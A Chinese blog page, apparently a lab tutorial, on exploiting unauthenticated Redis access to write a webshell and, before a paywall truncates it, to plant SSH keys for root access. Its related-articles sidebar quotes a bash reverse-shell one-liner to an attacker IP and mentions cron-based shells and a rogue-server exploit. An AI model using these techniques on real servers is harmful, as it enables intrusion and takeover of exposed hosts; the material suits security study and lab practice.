redis未授权漏洞详细利用

最新推荐文章于 2025-11-16 22:28:32 发布
原创 最新推荐文章于 2025-11-16 22:28:32 发布 · 3.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #安全 #数据库

该博客详细介绍了如何利用redis未授权访问漏洞进行攻击,包括启动redis服务、测试漏洞、通过redis写入webshell以及如何在redis以root权限运行时,利用公私钥认证获取root权限,实现SSH免密码登录靶机。

redis未授权漏洞详细利用

攻击机(kali):192.168.52.130

靶机(Ubuntu):192.168.52.134

1.启动redis服务

在这里插入图片描述

2.未授权访问漏洞测试

在这里插入图片描述

3.利用redis写webshell

前提

1.靶机redis链接未授权,在攻击机上能用redis-cli连上,如上图,并未登陆验证
2.开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限
(我们可以将dir设置为一个目录a,而dbfilename为文件名b,再执行save或bgsave,则我们就可以写入一个路径为a/b的任意文件。)

此时为本地搭建,已经知道目录,我们把shell写入/home目录下
在这里插入图片描述

在靶机中进行验证
在这里插入图片描述

4.利用“公私钥”认证获取r
最低0.47元/天 解锁文章
pray030
关注
Redis未授权访问漏洞利用
weixin_65049289的博客
01-17 690
Redis未授权访问漏洞
Redis未授权访问漏洞复现与利用
Forget_liu的博客
06-07 3145
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
Redis内存释放后重用超危漏洞(CVE-2025-49844):深度风险提示与防护指南
最新发布
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
11-16 2782
摘要: CVE-2025-49844(RediShell)是Redis数据库首个CVSS 10.0满分漏洞,影响所有支持Lua脚本的版本(包括6.x-8.x全分支)。该漏洞由Wiz团队在Pwn2Own Berlin大赛中发现,涉及Redis Lua解释器的UAF漏洞和沙箱逃逸,攻击者可利用特制脚本获取服务器控制权。截至2025年10月底,全球仍有8500+未修复实例面临高风险。 漏洞利用链包括:认证突破→Lua脚本注入→沙箱逃逸→远程代码执行。公开PoC降低了攻击门槛,黑产已将其集成到自动化工具中。防护方案
redis未授权访问漏洞(三种方法)
网安小白的博客
08-30 7141
redis未授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis未授权访问漏洞利用
zkaqlaoniao的博客
11-16 816
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞利用之前已经远程连接到的redis数据库利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
Redis未授权访问漏洞的重现与利用
qq_40882763的博客
03-24 2568
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
关于Redis未授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis未授权访问漏洞利用姿势的五种基础姿势
weixin_74182283的博客
03-27 1319
进行一个定时任务的配置指定路径与文件名,set 一个键名叫x 后面那一堆都是他的值 \n是为了隔开其他的信息(同第一段那个意思)其中的*表示时间(年月日 ) 这里为*表示每分钟都在执行这个任务(将数据一直反弹) 后面的/bin/bashxx就是一个反弹shell的正常写法,确认反弹到的主机(将靶机的信息反弹到攻击机kali上,ip就写kali的 8888为开启监听的端口)0>& 这玩意就是将标准输入重定向到标准输出,确保都能被执行到 确保交互性,反弹shell不会轻易断开。
python脚本实现Redis未授权访问漏洞利用
qq_60256199的博客
10-07 1809
python脚本实现Redis未授权访问漏洞利用
Redis未授权利用方式总结
hot_milk1的博客
08-07 1399
目前的大多数网站搭建的Redis 均采用 docker 一键部署的方式,而 docker 镜像中的 redis 默认不是以 root 权限运行的,也就是说即使拿下这台 redis,我们也只能在对方服务器的本地内网中漫游,当然还是会有部分 redis 部署在服务器中。
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1586
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
Redis数据库未授权访问漏洞的三种利用方式
zh的博客
10-22 3904
漏洞描述: 由于Redis默认是运行在TCP的6379端口上,而且默认安装没有设置用户访问认证,也没有访问IP限制,这样导致端口开放后,对Redis服务可以直接匿名访问,并且可对数据库进行匿名操作,信息泄露,执行命令等操作。 一、Redis数据库安装 虚拟机CentOS7,Xshell连接,拷贝安装包,解压 cd 看看有什么 src 源码所在的文件夹 安装编译工具:make 和 gcc 记得选Y 安装完成 进入src目录,执行命令:make 编译完...
redis未授权漏洞利用总结
Echo__h的博客
09-09 1572
redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据,并且可以利用redis写入shell、写入SSH公钥等危险操作。
redis未授权的六种利用方法(linux与windows)
JIN_7X的博客
09-15 2074
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。有一个利用脚本,https://github.com/n0b0dyCN/redis-rogue-server,但是这个反弹shell有问题,退出了redis也跟着退出了。,发现返回带中文不能解码,开始怀疑是编码的问题,后来发现是返回的数据带空格,把中文字节分开了,去上面项目的。
Redis未授权访问漏洞利用
weixin_68681298的博客
07-26 353
bash -i >& /dev/tcp/192.168.142.44/7777 0>&1:打开一个交互式的bash终端,与远程机器建立一个socket连接将标准错误输出合并到标准输出中,将标准输入重定向到标准输出中。启动Redis服务:/usr/local/soft/redis-6.0.9/src/redis-server /usr/local/soft/redis-6.0.9/redis.conf。进入客户端:/usr/local/soft/redis-6.0.9/src/redis-cli。
redis未授权漏洞利用
m0_63615772的博客
04-29 1815
利用这个漏洞我们一般会去实现写入webshell、写入ssh公钥、在crontab里写定时任务,反弹shell这三种,我们依次来实现。攻击机:192.168.112.1(window10)靶机 :192.168.112.188(centos7)
redis未授权访问的利用方式
Redredredfish的博客
08-23 1685
redis未授权访问的利用方式 漏洞原理: Redis<3.2默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的安全策略,比如添加防火墙黑白名单等等,这样会将Redis服务暴露在公网上。 如果在没有设置密码(默认为空)的情况下,会导致任意用户可以未授权访问Redis以及读取Redis的数据。攻击者利用Redis自身的提供的config命令,可以进行写文件操作,还可以将ssh公钥写入目标服务器./root/.ssh下的authotrized_keys 文件中,进而可以利用对应私钥直接使
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值